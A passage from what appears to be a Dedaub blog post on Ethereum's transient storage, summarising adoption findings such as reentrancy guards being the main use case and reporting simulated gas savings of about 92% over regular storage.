    The introduction of transient storage marks a significant evolution in the EVM’s data management capabilities. Our analysis at Dedaub reveals that while it is still in its early stages of adoption, transient storage is already making a notable impact, particularly in smart contract security and efficiency.

    Key takeaways from our analysis of transient storage usage include:

    • Reentrancy guards dominate the current use cases, accounting for over 50% of transient storage implementations. This highlights the immediate value developers see in using transient storage for cross-function state management within a transaction.
    • Beyond security, innovative developers are finding creative ways to leverage transient storage for storing contextual information and managing contexts throughout complex transactions.
    • The adoption of transient storage, while still limited, shows promise for improving gas efficiency and simplifying certain smart contract patterns.

    Gas efficiency improvements

    In our analysis of transient storage usage, we also evaluated its gas efficiency compared to regular storage. To do this, we collected the last 100 transactions for each of the contracts analyzed. For each transaction, we obtained its execution trace and used a Python script to simulate gas costs by replacing TSTORE operations with SSTORE under the same conditions (including cold load penalties and other storage rules).

    The results were impressive: across all use cases, using transient storage led to an average gas savings of 91.59% compared to regular storage operations. Below, you can find a more detailed graph that shows gas savings per category. Interesting to note that in the case of the Specialized Functionality, gas savings of around 98.7% were recorded. This is because of the airdropping contract mentioned above, and in this case memory might have been a more adequate comparison.

    Conclusion

    As the Ethereum ecosystem continues to evolve, we expect to see more diverse and sophisticated uses of transient storage emerge. Its unique properties – persisting across internal calls within a transaction while being more gas-efficient than regular storage – open up new possibilities for optimizing smart contract design and execution.

    Below we are publishing the dataset and scripts that were used for the above post.

    dump_transient_traces.zip